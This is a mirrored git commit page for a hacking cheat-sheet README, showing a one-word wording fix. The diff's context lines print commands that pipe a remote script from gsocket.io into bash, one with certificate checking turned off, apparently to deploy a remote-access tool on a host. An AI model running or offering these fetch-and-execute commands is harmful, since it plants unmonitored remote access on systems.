mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-07-10 20:53:43 +02:00
Update README.md
This commit is contained in:
@@ -1470,7 +1470,7 @@ or
|
||||
bash -c "$(wget --no-check-certificate -qO- https://gsocket.io/x)"
|
||||
```
|
||||
|
||||
or deploy gsocket by running their own deployment server:
|
||||
or deploy gsocket by running your own deployment server:
|
||||
```sh
|
||||
LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/xs)" # Notice '/xs' instead of '/x'
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user